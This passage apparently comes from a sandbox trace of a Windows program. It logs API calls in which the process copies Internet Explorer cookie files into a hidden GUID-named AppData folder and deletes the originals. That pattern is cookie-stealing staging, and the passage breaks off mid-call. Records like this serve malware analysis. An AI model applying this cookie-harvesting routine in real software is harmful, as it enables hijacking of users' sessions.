returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.459] StrChrW (lpStart="Low\\FLTMVY1F.txt", wMatch=0x74c005c) returned="\\FLTMVY1F.txt" [0252.459] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.459] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.459] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.459] StrChrW (lpStart="FLTMVY1F.txt", wMatch=0x74c005c) returned 0x0 [0252.459] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="FLTMVY1F.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FLTMVY1F.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FLTMVY1F.txt" [0252.459] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FLTMVY1F.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\fltmvy1f.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FLTMVY1F.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\fltmvy1f.txt"), bFailIfExists=0) returned 1 [0252.466] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FLTMVY1F.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\fltmvy1f.txt")) returned 1 [0252.467] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.467] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.467] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.467] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.467] StrChrW (lpStart="Low\\FOLSAQT6.txt", wMatch=0x74c005c) returned="\\FOLSAQT6.txt" [0252.467] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.467] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.468] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.468] StrChrW (lpStart="FOLSAQT6.txt", wMatch=0x74c005c) returned 0x0 [0252.468] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="FOLSAQT6.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FOLSAQT6.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FOLSAQT6.txt" [0252.468] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FOLSAQT6.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\folsaqt6.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FOLSAQT6.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\folsaqt6.txt"), bFailIfExists=0) returned 1 [0252.472] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FOLSAQT6.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\folsaqt6.txt")) returned 1 [0252.474] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.474] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.474] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.474] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.474] StrChrW (lpStart="Low\\GXB342YS.txt", wMatch=0x74c005c) returned="\\GXB342YS.txt" [0252.474] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.474] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.474] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.474] StrChrW (lpStart="GXB342YS.txt", wMatch=0x74c005c) returned 0x0 [0252.474] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="GXB342YS.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\GXB342YS.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\GXB342YS.txt" [0252.474] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\GXB342YS.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\gxb342ys.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\GXB342YS.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\gxb342ys.txt"), bFailIfExists=0) returned 1 [0252.482] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\GXB342YS.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\gxb342ys.txt")) returned 1 [0252.483] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.483] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.483] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.483] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.483] StrChrW (lpStart="Low\\H5LCJX1B.txt", wMatch=0x74c005c) returned="\\H5LCJX1B.txt" [0252.484] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.484] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.484] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.484] StrChrW (lpStart="H5LCJX1B.txt", wMatch=0x74c005c) returned 0x0 [0252.484] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="H5LCJX1B.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\H5LCJX1B.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\H5LCJX1B.txt" [0252.484] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\H5LCJX1B.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\h5lcjx1b.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\H5LCJX1B.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\h5lcjx1b.txt"), bFailIfExists=0) returned 1 [0252.489] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\H5LCJX1B.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\h5lcjx1b.txt")) returned 1 [0252.492] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.492] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.492] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.493] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.493] StrChrW (lpStart="Low\\HBPP9XXY.txt", wMatch=0x74c005c) returned="\\HBPP9XXY.txt" [0252.493] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.493] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.493] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.493] StrChrW (lpStart="HBPP9XXY.txt", wMatch=0x74c005c) returned 0x0 [0252.493] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="HBPP9XXY.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\HBPP9XXY.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\HBPP9XXY.txt" [0252.493] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HBPP9XXY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\hbpp9xxy.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\HBPP9XXY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\hbpp9xxy.txt"), bFailIfExists=0) returned 1 [0252.515] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HBPP9XXY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\hbpp9xxy.txt")) returned 1 [0252.517] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.517] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.517] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.517] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.517] StrChrW (lpStart="Low\\HF8F6LU0.txt", wMatch=0x74c005c) returned="\\HF8F6LU0.txt" [0252.517] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.517] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.517] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.517] StrChrW (lpStart="HF8F6LU0.txt", wMatch=0x74c005c) returned 0x0 [0252.517] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="HF8F6LU0.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\HF8F6LU0.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\HF8F6LU0.txt" [0252.517] CopyFileW 